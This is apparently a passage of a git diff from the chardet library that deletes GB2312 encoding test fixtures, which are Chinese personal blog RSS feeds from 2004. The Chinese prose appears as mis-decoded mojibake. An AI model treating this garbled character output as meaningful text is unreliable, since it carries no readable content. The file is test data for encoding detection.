¬־ׂׂ²¾ֽ¶¯ֱֻ׀ִׁ¡װסֱֻֻ¡£¿ַֹ£¬ֳ»׃׀ֿכµ½£¬ֻ²»µ«²»ַ¡°²»½פ±ֱ¡±£¬¶רַַׂ·ַ³£µִ¡°½פ±ֱ¡±£¬ֹץײֱ±ָ±נµִֵֶ׳׃µִֿ´ֳזִּ»¹ׂס°½פ±ֱ¡±£¬ֳָ־ֿׂ´ֽךֱ³÷ף£¬²»µֳ²»¸ֿ¿לֽ¿ֹֿ»₪·פ׃ֳֶ·²ֵ׀׀¡£ ֻשׂװ£¬´׃´ֻׂװ÷ף£¬׳װ¼÷¶װ»¯׳±ֶ·µִ¹ד¸זׂ²²»װֳִַ´½«׀ֵ²»ֱֹֻׂ¡£

    -

         ֱםֽג£¬ֵ¼¶־ׂ»ב׳צׂ»׀©ֳזִ₪¡£ֿײװ¹׃ֳָױ±¾µִ¶¹ָיֳזִ₪£¬¸׀¾ץֽ¦ז·‏µִ¡£ֳ¿´־£¬׃ֳֽךׂװ÷ף£¬ײ־§µִֵף׃ׁ¶¼»בֻµ£¬־ׂµִֶ₪·פ¸׀¾ץ÷ֳ¡£

    -

    2.ּ¸ּ¸¶װ»¯׳±ֶ·µִ¸׀¡£

    -

     A. ·±‎¡£װ¹׃ֳµִ·±‎ײ׀£¬¶װ׃נ־קµִ·±‎¸׀¾ץ²»ַ÷÷ֳ—-ֽ¿װֱ³ֹֿµִׁױֹ«ּ«°׳£¬÷²»׳װָ»£¬¶רַׂ£¬¶א´־ּ‎ײ־§µִֵף׃ּׁ¸µ½£¬׃נ־קµִ·±‎÷¬ַ¦ֱ¿ּ«¸£¬¶װֶ₪·פ׃׀÷¦¡£ֻשׂװ£¬ׂװ÷ף²»´עֻד¹׃ֳ׃נ־קµִ·±‎¡£

    -

    B.־´ֽך£¬´‎׀ר

    -

    -]]> - http://lily.blogsome.com/2004/12/29/oouaeuadhaua/feed/ - - - ִֽך»ב - http://lily.blogsome.com/2004/12/25/iuaea/ - http://lily.blogsome.com/2004/12/25/iuaea/#comments - Fri, 24 Dec 2004 06:25:41 +0000 - lily - - ־ח÷ףֻז± - http://lily.blogsome.com/2004/12/25/iuaea/ - - 12װֲ/22ָױֽם£¬־ֳַׁׂ׀¾¿ׂׂ»׀׀5ָֻ¿×ִֽך»ב£¨₪₪¦₪ֽ₪ף₪«₪₪£©¡£ִֽך»ב£¬ׂג־¶׳ֵ´ף¼ׂװׂ»ֶנ³װ³װ·¹£¬ֱֱִִּל£¬¶װ¼´½«¹‎ָ¥µִׂ»ִך½ר׀׀»״ׂה÷ֽ׳½ב¡£װָױ±¾£¬ֳ¿¸צֵּֽו£¬׳י÷ֿ¼¸÷ץ¶¼ׂ×װױג¸צִךִ©µִ±÷ע£¬¿×ױגײײ¡°ִֽך»ב¡±¡£ ־ֳַׁׂ׀¾¿ׂ°ׁ½סִךִֽך»בµִָױ׳׃¶¨װֱֻ12/22ָױֽם£¬ֶהײ׀ׂ»¸צײ״ׂ×µְִם׃ַֹ£¬12/22ָױֽםֹֿSM½ּµִ¿־¿ֹׂװ½ט´ֻ׀ֿ¢ֱֻ¡£ׂע´ֻ£¬´ף¼ׂ׀ֻײֲ²×²×µ״µָ´‎׳ֵױג¸צִֽך»ב¡£ָ»¶ר£¬ׂ»¼‏²»ֶ¶ר׃צµֲִַי·¢ֹתֱֻ¡£ ׃ֹ׃£¬־ֳַׂ´עֻדָ¥µִµך—-°׳ִ¾־£¨₪·₪י₪­₪ה£©װֶ½±µִ±÷ע£¬¿ָֻֽ²»ַ÷¶א£¬ֻשׂװ£¬½סִךµִִֽך»ב£¬־ֳַׂ´ף¼ׂ¶¼ֿכµ±ָ»µ״ָֿ־×£¬²»׃ֳּבַ°װ₪װ¼£¬ׂ²¿ֹׂװֻזµ½ֻז³װ¡£¿ֲַֹ׃כװ¸־¥£¬µ±־ְֳַׂ´µ½ִַ¼ׂµךµִ±÷ע£¬·¢ֿײׁׂ¾­ַ׳ְ׳ְ±¬ֲת£¬ְֿ°ו÷¿ֶֽרµ״°ׁ־ֳַׂ¾ײ®ֳֵֽג¡£ׂ»¼ׂ²»׀׀£¬־ֳַׂװָ¥ױֱׂםׂ»¼ׂ³װ°ֹ£¡¾ֽױגׁש£¬־ֳַׂׂ»׀׀5ָֻ׳װֱֻ׳מ·±»×µִ½ײµְֹֿ¡£¿ֹµ±־ֳַׂ׀ֵ׀ִ®׳דµ״ְ´µ½µ¶‏¼ׂ±£¬ַי¿צְָׂ»ָח´ֻ£¬¼´¹־ֳַׁׂ¡װסµַָ°ֳזµִ¿ָֻֽ³װֽךװָכ׳ש±£¬ְֿ°וְָׂ»÷³ֿ¿ׂµ״ָ°¸ז־ֳַׂ£¬¿ײֲֵׂ×µָ÷³₪±¼ה£¬»¹ַָָֿ¥±נµִµך־×÷ֳ¡£÷ֳ°ֹ£¬ִַװָ¥ױׂµָ‎¼ׂ°ֹ£¡……־ֳַׂ»¹ַ³װֱֻ±ױֳֵ¸‏£¬µ4¼ׂ£¬µ5¼ְׂׂ¾ָֹח´ֻ……¡£ױג±£¬5¸צָֻ÷ֳ־ִ¿µִµ״ֻֻׁק׳ֵ¿ֹׂװָ׳ר5¸צָֻ¿×ִֽך»בµִ²ֽ¹£¬³ה·ײּו»בµ½ֱֻµ±׀³¡¹©²»׃¦ַף±µֲִפ·½׀³¡µֱִ¦ֱ¿¡£»״ֿכµ½ֶ½ָױ£¬ײ»ׂ×ֻז±ד½רִִ¸צµך£¬¶¼ִֿםµ½ײµ½µִ·‏־ס¡£¶רָח½ס£¬ײ»ִ־ִ־µ״ֳז¶װְֿ°ו־¯ֽסµִ¾¾ר¡£׃פֳֶ°¡£¡…… ׀ׂ÷ֳ£¬װ־ֳַׂ׃־µ´1¸צ¶א׀¡±ׂװ÷ף£¬׳מ÷ףײױ׃ױׂµ½ֱֻׂ»¼ִָׂ׳ר5¸צָֻµִׂג´ףְ²ֽ¹£¬ֳדֳדַ¿ַ¿µ״ֿםֱֻ½סִךµִִֽך»ב¡£־ֳַׂ±¾ְ´´עֻד÷ֳ÷ֳ³װׂ»¶µִִֽך»ב¾ֽױגׁש²²µ״ֽךֱֲֻ¡£ָח¹־ֳַָׂ¥°׳ִ¾־µִ»°£¬¿ֹׂװ¡°³װֹ¶׃׀ֹ¶¡±£¬¶רֿײװײ»ֲֲִהµ½¡°׃׀ֹ¶³װֹ¶¡±ֱֻ£¬ײµµֳַל׀ׂµִַ£¬־ֳַׂ»¹²»ַ¡°³װֹ¶ֳ»ֹ¶¡±¡£ ½סִךִֽך»בײµµֳִֽׁµֲִ£¬ׂװ÷ףׂ»¶¨ׂ×ּבַ°װ₪װ¼£¡ -

    -]]>
    - http://lily.blogsome.com/2004/12/25/iuaea/feed/ -
    - - ׀₪ֹך¿ֻµִ¾ָך - http://lily.blogsome.com/2004/12/21/%d7%abia/ - http://lily.blogsome.com/2004/12/21/%d7%abia/#comments - Mon, 20 Dec 2004 14:37:07 +0000 - lily - - ־ׂ¿´־ֿׂכ - ־ח÷ףױ×ֲ¼ - http://lily.blogsome.com/2004/12/21/%d7%abia/ - - װXXµִֶֽ¼צֲֿ£¬־ׂײ×µְֱֻ¡¶׀₪ֹך¿ֻµִ¾ָך¡·ױג²¿׃°ֶ¬¡£²»ײ×־ײֳ´£¬־ׂׂ»¿´µ½ֻ£¬¾ֽֿ²»¶ֱֹֻֻֿ¡£׃°ֶ¬£¬½׳א»÷ֲ‎£¬µ«ַ²¢²»³ֱֳֶ£¬ֻז¸ז¸µ״ֿע־ֳַׂ½²צ׳ֵׂ»¸צ¹ֲ£¬ׂ»¸צָֻ£¬ׂ»¸צ¾׃׀¼ב¶¨׀ִֵמµִָֻ£¬ׂ»¸צ¾׃׀ײַ»µִָֻ¡£׃°ֶ¬ֳ»׃׀¿´µ½־ׂ‎¹ײ¹׃ֳµִײ·¨—-ָ­ֽ·÷ֽױםֽ·¡£µ«ְַֻׂ¾ִֹֹמֹמµ״־ׂ‎׳ֵ־ׂ¡£ ױג²¿׃°ֶ¬´׃µ®ֹתµ½ֿײװ£¬ׁׂ¾­10ִךֱֻ¡£ָ»¶רֻ²¢ֳ»׃׀ֻז׳ֵ±¼הµֱִק§ֳָָֻµ­ֽ£¬ֿא·´£¬¸¶אµִָֻײ×µְֱֻױג²¿׃°ֶ¬£¬²¢ַֿׂ²»¶ֱֹֻֻֿ¡£ ׳×װ״ׂ»ֶ×¹״׃ֻµִ־ִױֲ£¬־ִױְֲן½גֱֻֽ־ׂ÷ֽXXµִֹׂ»ף—–־×÷־׃°ֶ¬׃ײֳ¡¶´ּ¼₪1995¡·¡£ֱםֽג£¬־ִױֲ¸½׃׀¾­µהµִ´©°ן¾µֽ·£¬µ«ַט¦²»ׁט₪¡£¡¶׀₪ֹך¿ֻµִ¾ָך¡· -

    -]]>
    - http://lily.blogsome.com/2004/12/21/%d7%abia/feed/ -
    - - ָֹֿתיףֲ - http://lily.blogsome.com/2004/12/21/eyaeoea/ - http://lily.blogsome.com/2004/12/21/eyaeoea/#comments - Mon, 20 Dec 2004 13:10:29 +0000 - lily - - ־ח÷ףֻז± - http://lily.blogsome.com/2004/12/21/eyaeoea/ - - ׁ¿´¿לׂ×½ברָױ±¾µֱִפׁ§ֹת»מֱֻ¡£ֿײװ׳׃׀׀©µדµדµ־µ־µִֽשֲ£¬¸¡ֿײװ־ׂµִַׁ°¡£ױגֶהײ׀£¬׃׀ְׁב£¬׃׀»¶׀¦£¬׃׀¸קײײ¸קׁשµִֻבּנ¿אְ±¡£µ±ָ»£¬SMָֹֿתµִָ₪ֲַ±״²»¿ֹֹµִ»״ׂה¡£ SMָֹֿת£¬ַ־ׂװ´ףׁ§µִ½ּ£¬ׂ»¸צװׁ׀¾¿ֹֿ÷ֿׁ¸ס£¬װֹת»מֹֿ÷׃׀ָ₪µִָֻ¡£ֿײװ£¬»״ׂהׂ»ֲֻֿ3ִךַ°·¢ֹתµִׂ»¼‏ָ₪ֲ£¬׳ק־×¶װױג־»½ּµִ¼ִֽמ¡£ ִַַ־ׂ¸ױְ´ָױ±¾²»¾ֳµִׂ»¸צײׂ»£¬ִַ±£¬־ׂ»¹װ׳צׁ׀¾¿ֹת£¬ָ¥ֹֿ¿־µִ±÷ע£¬װ׳ְְָן׃צ¼ֱֻ־ׂµִ½ּ—-SMָֹֿת¡£ֻׂ»¼µ½־ׂ£¬¾ֽ¸זֻ־ִֻׂװ׳׃ְן÷ֳֿס³₪¶«־קֱֻ£¬¾«ֹס׳´ּ¬÷²»÷ֳ£¬ׂ»¸±׃ַ׀ִגחגחµִׁש׳׃£¬־ׂ¿´ֻ÷ֳ¿ֱֹ¯£¬ׂ²ִׁ¹‎ֱֶֻנְ´¡£±¾ְ´´עֻדָ¥¸ֹ±נµֲִµִ־ׂ£¬¾ֽ÷ֻֽׂ»ֶנ׳½רֱֻֻµִׁ׀¾¿ׂ£¬ֻ¼ּ׀רכ¶׳ֵֻµִ²¡£¬¸זֻ־ֻׂׂ×dieֱֻ<׃ֳ׃¢־ִֻµµִ>£¬ֳָ־ֱׂםױׂ½ּ°ֹ£¬ֻ²»ִװ´ר־ֱֻׂ¡£ֻ»¹ֻµײָ‎װָ¥¸רֽ·²¿ִֵ¸צֶ¬׳׃£¬²»ײ×ַ²ֳ´²¡£¬ֿײװױזַ÷µ£׀ִ¡£־ׂׂ»¸צ¾¢¶שµ״װ׳לָֹֿ°ֻ±נµ£׀ִ£¬¿ֿ¶¨ֳ»²ֳ´´ףֲ£¬µ«ַ׀ְִןׂ²²»ֳגµ£׀ִֶנְ´£¬….¡£ָ»÷ף£¬ֻ׃ײ־־ַׂ·ס¼µ½HY< ֻµֱִםׂ»¸צײ׀¹תׁ§ֹת>£¬°ֻׁ‎¸ר־ׂױְׂ´……£¬DLY< ִַ±¸ױ±ֿׂµµִׂ»¸צײ׀¹תׁ§ֹת>²ֳ´±÷עװ»״ָױ±¾?…… ֽםֹֿ£¬־ַׂכִד³װ·¹°ֹ£¬ִדְ´ָױ±¾ׂװ÷ף£¬־ׂ»¹ֳ»׃׀÷ִֽד³װ¹‎·¹ִ״£¬־ֻׂµ²»׃ֱֳֻ£¬ֻײ´ׂגׂ×ַכ־ׂ£¬־ׂ¾ֽ¸¼׃µ״ִׁ¹‎ֶנְ´¡£ױױׂ»ֲֿ־חµִ¿־ׂ²ֳ»ֹֿ÷ֳ£¬־ׂׂ»ײ±װµ£׀ִֻµִֹםּו¡£ ִַ±ׁׂװֻײֲֿ´פֱֻ4/5ִךµִHY£¬ּ‎µ½ֱֻֻµִַי¿צ£¬ֳ»׃׀µ±»״ֲ¡£ֻ‎ֻµֻ¶א°כ¶שֳ»ֲ¡£־ׂ½«׀ֵ½«ֹׂ¡£HY½רׂ»²½¸זֻ־ׂ£¬ֻֿײװ¸¶אµִַ׀ְִם׳ק׃ֳ£¬ָֻ¥¿´ׂ½ֹתµִ±÷ע< ׂע־×ֻװׂ»ײַ°¾ֽ¸׀¾ץµ½ֽ·ּ£¬ײִ©ָ¥¿´ֱֻׂ½ֹת>£¬ׂ½ֹת־ֻ׃׀ֳ»׃׀¸׀µ½¶ס׀ִ£¬ ֻֻµֳ»׃׀£¬¿ַֹ»״µ½¼ׂׂװ÷ף£¬ֻֿכֶנׂ½ֹתµִ»°£¬װ½ֿכ¾ֽװ½¸׀µ½¶ס׀ִֶנְ´£¬ִד¿´£¬ױג²»ַ׀ְִם׃׀ֳ«²¡ֳ´?HY¼ב¶¨ֻ‎µִ¹µד¡£¿ֹ־ׂ²»¸ׂµפׂװַב׀ִ£¬»¹ַµָײָ‎ִֵֽךֶ¬װֻµ°ֹ¡£ ֽםֹֿ־ֳַׂ³װ·¹µִ±÷ע£¬ֻֻµׂ×±­ֶ¡¾ֶ£¬־ָׂ°ֻ±נ÷ֱָֻ£¬ֻֻµ¾ֽ÷ָׂ»±­£¬־ׂװץִ÷ֽ½ּױשײ´ִ״?… …³װ׳ֵ·¹£¬ֻ׃ײ¿×¼µ£׀ִֻµִִװ´ֱֻ£¬־ָׂ°ֻׂװ÷ף°ּׁׁ¸ר½הֱֻ°ֹ£¬¡°÷ֳ¡±ֻֿס¸צ׀¡÷¢ֶֻµִ¹װ¹װµ״´נ׃¦ֱֻ£¬ָ»÷ף׃ײֻµ£¬¡°¿ַֹ½הּׁ÷ִׁ……¡± ֻ¸זֻ־ׂ£¬ֻ½סּל¸ר±¾¿ֶֹתֹֿ¿־µִ±÷ע£¬¸ת´ף¼ׁׂׂ¾­µְַ¸ֱֻ£¬ֻµָח¹ֻ»מ²»¹‎½סִך£¬ֳִַ´´ף¼ׂ¿ֳִִֹ²»µ½ױג¸צׁ§·ײֱֻ£¬¶װ²»ֶנ´ף¼ֱֻׂ…… ײ¶‏£¬ֻ׃ײ¸ר־ׂ÷ֱֽםׂ»¸צָױ±¾ׁ§ֹתֹֿ¿־£¬ײ״¸´׳ֵֻ²¡ַיµִֿׁײ״׀װ…… ־ׂ½¹¼±µ״µָ´‎׳ֵײָ‎µִ½ב¹¡£ײָ‎ֲֿ־ח£¬ֻ´׃ׂ½װ÷¼ל²י»״ְ´£¬¸זֻ־ׂ¡°ֹׂײ¢ֳ»׃׀¡±¡£־ׂµִ׀ִײױ׃³¹µ׳µ״·ֱֲֵֻֿ¡£HYױג±¸¼׃ְםײ±ֶר׳³µ״ֻµ£¬ֻ¾ַֽ°®ױגׁש£¬°ׁ׳װ¼÷µִׂ»µד¶ש׀¡ֲ¿´³ֹ´ףֲ£¬־ׂ¿´ֻµִ²¡¾ַֽ¡°ֳָ²װ׃¬¸רֱֻּׂ»½ֵ£¬…..¡±ױג±־ֳַׂ¶¼¹‏¹‏´ף׀¦ֱֶֻנְ´£¬ֻװׂ»±ּ‎²»¶®־ֳַׂµִײ׀־ִ£¬µ«¿´µ½־ֳַׂװ׀¦£¬ֶֻ÷ץִ²ֲµ½¼¸·ײ£¬ֻµ¡°÷׃׀ָ₪ֳ´?¡± ־ֳַֻׂµ£¬¡°µ±ָ»÷׃׀ָ₪ֱֻ¡± ֻׂ²¿©,¿©,¿©……µ״ְײֶנְ´. ױג¸צְֿ׀¡÷¢£¡ -

    -]]>
    - http://lily.blogsome.com/2004/12/21/eyaeoea/feed/ -
    - - ¿×ױֵֶ× - http://lily.blogsome.com/2004/12/15/hello_world/ - http://lily.blogsome.com/2004/12/15/hello_world/#comments - Wed, 15 Dec 2004 12:55:55 +0000 - lily - - ־ח÷ףֻז± - http://lily.blogsome.com/2004/12/15/hello_world/ - - װֵף׃ׁµִ½יֹ÷ֽ°ןײתֲֿ£¬־ׂײױ׃׃µ׃׀ֱֻ׳װ¼÷µִ²©¿ֽ¡´blog¡µ£¬ׂװ÷ף£¬־ׂ¿ֹׂװ׃ֳױגײײ·½½÷ֽ´ף¼ׂ½»ֱק¡£ -

    -]]>
    - http://lily.blogsome.com/2004/12/15/hello_world/feed/ -
    -
    -
    diff --git a/chardet/tests/GB2312/luciferwang.blogcn.com b/chardet/tests/GB2312/luciferwang.blogcn.com deleted file mode 100644 index 0273539..0000000 --- a/chardet/tests/GB2312/luciferwang.blogcn.com +++ /dev/null @@ -1,30 +0,0 @@ - - - - - ֽץ°½÷ֽ¶­׀¡²ר - http://luciferwang.blogcn.com - ֹֿ - - - - - - - - - - - - - - Blogcn.com - http://www.blogcn.com - http://www.blogcn.com/v2/logo.gif - - °ֲµַֻµµִ´ףµ»° http://www.blogcn.com/User3/luciferwang/blog/27529301.html
    ױגֳ´ֶ½³£µִׂ»¸צ¿×ֽ·£¬ִׂ‎³צ²ֳ´ׁשµִ¹µדִ״£¿

    װ·ֹ»תֹֿ¶ֱֱֻֻ־×ֵ£½עַבֹֻ«ׁ¡׀´µִ׀עׁװ£¬ֲֿ¸צװֲױׂ±¼הׂכ³ֹײ׀־ִ¡£

    °ֲµַµִ־ִ׳ײ£¬׃ֳµִֵַ£½עµ¼¦µִ¿־ַ£¬²»ֽז׀‏׀י£¬ֹתֲִֵד¿´²»¶®£¬¿×¼׳ֳָָֻ¾ץµֳ׳קױ׃׀µדּ«±£״ֱֻ£¬¿ַֹ¶ֱֲָֿ¥¾ֽ»ב·¢ֿײ£¬ֻµִ¹µד¾צ·ִַד¿´ֱֻ־ִױֲ¿×ֽ·¾ִֽװ₪ֱֿµ½µִ£¬ֻµִ¹µד¸תִדµִ²»ׂ»ׁש£¬¸תִדָֿ¶µִֶהָֻֻµֳׂ²²»ׂ»ׁש£¬¾ֱֽ¬°ֲµַ׳װ¼÷¶¼־´±״ֿא׀ֵ£¬µ«ָ·µַ°÷¬׳ֵ÷ֳַֹמ£¬÷¼ע½א£¬÷ֽ¸³¹µִֻ¼ֿכµִ¡°ִ£׀ֽ¡±¡£

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ¸ר°ֹ°ֲֹ¹¹‎ֹתָױ http://www.blogcn.com/User3/luciferwang/blog/27507052.html ¼¸ִךַ°£¬ֻ‎¸ר־ׂ½יֱֹֻ¶­׀¡²ר¡£

    ³װ·¹µִ±÷ע£¬ׂ»־»±±´ף±ֿׂµµִֵף׃ֻֽׁ¸ר־ׂׂ»ּ׳¡¶־´ֳ÷‏ַ¸צ÷£ׁף¡·µִ¼ִֽמCD¡£½סִךִּֿלײֶ׳ק·½ױׂµ½־ׂ£¬ֳָ־ׂ²־¼׃ֲ¼ׂפ£¬¿ַֹ־ׂµ±±²»ִ»״¹ת£¬¾ֽ°ׁױג¸צֿֿ¢׳׸ז׀׃‎ײס¡£´ףׁ§ֶ¼ה־ׂ´ף¸ֵ׀´¹‎20¼¸׳¸ט£¬÷ףְ´װׂ»¸צ´ֵ´רְןֲ¼ֱֻ10׳׳ף׃ׂ£¬ָח½סׁׂ²»ײ×ָ¥ֿע¡£±ֿׂµ÷ף׃ײ׀´¹‎¼¸׳£¬ֶהײ׀׃׀ׂ»׳ַ¼ִֽמ־ׂׂ»¸צ±»¹״½ר¾«ֹס²¡װ÷µִֵף׃ׁµִ£¬ִַַ¼´׀ֻײ®׳ק£¬ׂ²ַ׳מ÷ֳµִׂ»׳¡£

    »״¼ּׂ‎ׂ»±יCD£¬׳מֿ²»¶µִ»¹ַ³ֲ׃ְ÷££¬׃׀»״־¶¡£

    ַ°ּל׃צ¼´ףׁ§ֽ¬ׁ§ױֵֵפ¸£¬ֻ¸זֻ־ׂ£¬¡°ִדׂ×׳צ³¹µ׳µִֽץ°½£¬±ה±¾¼׃ְק¡±¡£

    ֻµµִ¶װ¡£
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀‎׳×µִײ׀ַׁ־טµ¸ http://www.blogcn.com/User3/luciferwang/blog/27270442.html ׳רֲֿׂװ÷ף£¬·¢ֿײ׃ׂײ±ַ³ֲֶ½װ­£¬ִֿֿ‏÷ח·ע¸¾£¬ַ°ֳז׳ר׳ֵ¿׳ַל¶«£¬װ­ְ´׃׀ױגֳ´¶אײ׀־ִֿµµְִָֻ´¿´¡£

    ֱֽ¶תֶהְָֻק÷¦£¬־ׂװְֳ¹ת¿´¹ֱֻ¾פ¿ְײ£¬ׂ¡¹צְײׁ³צ£¬ֽ»ָ»ְ´¿´ײ׀ַׁ־טµ¸£¬±¶¸׀´ּ¼₪¡£
    ִַ׀©¼₪ֱׂ¶א±הµִ½׳א£¬ׁ‎ֳִ¶א׳ֻµִ¶¯׳ק£¬ֳָ־ׂ÷ֽ׀¡²ר¶¼highֱֶֻנְ´¡£

    ־ְֵֶֿׂװ­ְ´ַ¸צ¸ײ£¬»״¼ׂ÷ֻֽ‎ּר־ט£¬÷ףְ´·¢ױ¹µ½ֻ₪ץ׃ֽז¶ש£¬²»¹־ׂװץֳ´ֱ¦µ׀ײַָ¡£¬½ב¹¼¸´־¶¼±»ֻ‎ײֶ·‏

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀ׂ¸£ http://www.blogcn.com/User3/luciferwang/blog/27211161.html ־ׂ÷ֽ׀¡²ר°ןֻ‎ּב׀׀ְמ£¬ױ‎ֳ¦׳ֵ£¬½׃µ½ך°י¦µח»°£¬װ¼ֱֻ½סּלָ¥¿´ֱֽ¶תֶהׂפְײ¡£

    °כׂ¹־ׂ׀ׁ¹‎ְ´£¬¸׀¾ץ·¿¼הְןֶ®׳ֵ׀ַ׀ַ÷ֽװֱֱֲ£¬¶­׀¡²רֽ¬ׁ§ְ­׳ֵ־ׂµִײֻ¯¾ץ¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ¾»ב http://www.blogcn.com/User3/luciferwang/blog/27157016.html ־ׂ÷ֽ¹ֻֿזָֿ÷ֱֶָֻנְ´£¬°ֹ°ֲֹ¹ֻז÷ף¸ֿµ½£¬´ף¼ׂ¾ֶכ£¬¿×¼³װׁעָג´®±ָָר±‎£¬ֹץ»¶¡£·¹÷ףָ¥ֱַֻּ¹£¬¹ֻֿז÷ֽ°ֹ°ֲֹ¹װׂ»ֶנµװּ«÷ֳֽזֱֻ¡£׀¡²רּר־ט£¬°ׁ־ֳׂװµ¹ֱֻ¡£

    ־ׂ÷ֽ׀¡²רֳקּל¼ּ׀רױׂ¹ֻֿזֽז¡£






    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀¡²רֻµ http://www.blogcn.com/User3/luciferwang/blog/27107206.html (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> ֶזֳמ http://www.blogcn.com/User3/luciferwang/blog/27037020.html
    װ±±¾©£¬ױזז·‏¡£׳עּל¿×¼³צֳֵ¼ֵף׃ׁ£¬ ½סּלָ¥±±´ף¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    װ¸׃׀ַיָֻ½ב³ֹ¼ׂפ http://www.blogcn.com/User3/luciferwang/blog/27004822.html


    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ¸רׂ»¸צ«¸טִךׁ¡µִ12׳׳קֶ· http://www.blogcn.com/User3/luciferwang/blog/26851311.html
    ־ײֳ´£¬׀ַֿף´ף¦£¬ִד¿´׳ֵ־ׂµִ
    ׁײי£¬·ֲ·נְִַַ½חµֲִײײ׀ֲײ£¬־ײֳ´

    ָֹֻת׃׀ָ±÷¶£¬¾ר¾ה׃׀ֹתֳ£¬¶ר־°´ףµִִ¾½³
    פ׃־°´ףµִ¶₪׳׃£»־ײֳ´£¬¸ר־ׂׂ»¸צ²׀ָּµִ´נ°¸£¿ 


    ¾ר¾ה 

    װ־ׂµֱִ½´־£¬ַבַבµִ±ְְ£ײ®¼ה
    ׃׀ׂ»ָֹ´°£¬ׂ»ֵץֶ¡¾ֶ»¨£¬»¹׃׀ׂ»־»ַ§±הֽע»¯µִֵף׃ׁ 
    ׃ֳ±¦¯ֹ«µִׁ¾¦£¬ָ¾׳ֵ־ֹׂםֹֿµִ¸קײײ¹ג, ־ׂ²»ֽ£µ״°®ֹֿ

    ´׃־ֹׂםּוײ׀³¶³צµִ£¬ׂ»ֻ¿ֻ¿ֿעַ°ֶ®ֶׂµִׁ×£¬ֳַֻװ´°ֽג 
    ·ֲ·נ׃ך÷ףµִ׃£ּׂק£¬־ׂ¿ֹ²»¿ֹׂװ±ה»״־ׂ׳װ¼÷ִ״£¬²»׀טׂ׸זָֻ־÷־ָֻ



    ׳£¾ֶ

    ־ֳַַׂ±ֲּּµִַאּ¦£¬װ¾ֶ÷ף
    ¸ח¸חׁׂ¾­ְכ»י£¬¶רַׂ׃׀ֿר´­
    ־ׂײײ׀µִ¾ֶ׳×׳ֵ»¨µַֹֿ±­׳׃
    ·¢³צµִׂפְײ£¬¾ֽֿס¥µ®½µֱִומץ
    ±­׳׃׃כֶ¡¾ֶµִׂ¡µ´£¬ַ·סװ»״ׂה
    ױג¿י²£ֱ§³ֹ׀ַֽ°£¬ֿײ³צ¹‎³דֱׂµִ·הֳֹ«
    ¸ח¸חֽב׀±µִֹםּו£¬±»־ׂײ§³ֵ£¬ָ»÷ף»¬µ¹
    ־ׂ¸§ֳ‏׳ֵ×הץהץµִµ״ֳז£¬ׂ²²»ײ×µְ
    ֿ¥¸ַַ·ס¿ִֶֶ£¬װ־ׂ³ֹ׀ֽײ®÷ף£¬ֻ
    ׂ»ײ±ָֿ־×׳װ¼÷ַ·ֶֿ·¡£־ׂׂ²־‎´־־׳װ¼÷
    ־ַֻׂµִ׃°׳׃ֲנ£¬±¹גµִ׀±ױױ°ׁ׃°׳׃¿ה´ף
    ־ׂׂ²ֿכ°ׁײײ׀µִ±­׳׃£¬׳צ³ֹׂ»ײ§²ֹ«µִּׁ¶·
    »עױ°²¾²µִµֵֶ£¬ֻֽ¸רֻ£»־ׂ¾ץµֳ¸ֹ±­µִֻ²¼ה
    ֻש׃׀µִֹֻ÷¶¼±ה³ֱֹֻ»¨־ֶ÷ֱֶֽ¬£¬ֻשׂװ־ׂ»בְ´µ½
    ִדµֳִזַ°£¬׃׀±ֳַ·ה£¬׳×ׁ׃ײַ÷µ£¬³ֿ¿ׂ¶ר־ײ×
    ¾ַֽ־× (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ֵ¼¸׀ http://www.blogcn.com/User3/luciferwang/blog/26741878.html
    ½סִך־ׂׂ»ײ±װ¿¼ֲַ¸³µִ־ּג£¬¹ֵ«ײ®ֱק£¬ׁ±ה³ֹ°ֲֽעֿףµִ־ְִא£¬÷¶אֽג¹תµִֿײ´ת³₪«£¬ָח¹ֳִµ½ײ׀¹ת¹ֵ´ת£¬ֶהµ¾ַֽ¸³£¬ֵ׃µֲ£¬°ֲµַ£¬·µ־ִֻ¹£¬ֳַֻ׀´µִ³₪«²»¾ַֽ¸³ֲנ¡£

    ½סִך¶ֱֱֻ÷¶א¸³¡£ֶהµ׃׀÷¶אֶּ¸³׀´µֳ÷÷ֳ£¬ׂװַ°´ף¼ׂ¶¼ּבײ׀¹ת«ָח÷־׳ֿעֲֹµִµְֲ·£¬ִֶַּ³¯µֲִֹ¸³µװֲַֹ«¸¹³₪½£µִ׃־°י£¬÷ףְ´´ף¼ׂײ»׳¢ׂג¹ֵ־ִװֻ¶¯£¬ֶהµװµ±±¹ֵ־ִµִ׃°ֿלװ¶²»¼°¸³£¬־ִּ³׳ײקׂ²²¢·ַ÷«ֱר£¬¶רַ׀´ֲֵֵֹ÷ֲֹֽ¸³µִװ×°׳£¬ׂ×ֻµװ×ַב°׳ֻ׳£¬ַ²»¹«µְµִ¡£

    ¶א¶ֱי£¬¿´¿´¹ֵֽש־ְִאµִ¾±ה£¬¶װ´‎׀´׳ק¾ֽ»בװ½ְ´װ½ֶ½¾²¡£
    ¾ר´ף²¿·ײָֻ²¢²»ײ×µְ׳װ¼÷װ׀´²ֳ´£¬ײ×µְµִָֻ׀´ׂ»ֶ×ַׂ»ֶס£

    ¶¬ָױ½ר²¹£¬׳װײֶ³ז²ׁ‏ײש¼¦ְּ£¬ֹץְֳ¡£½ֶ·‏׃ֳ·ה½÷£¬װֻ¶¯±¸׀¾ץֳקֿװ׃׀ֱ¦¡£

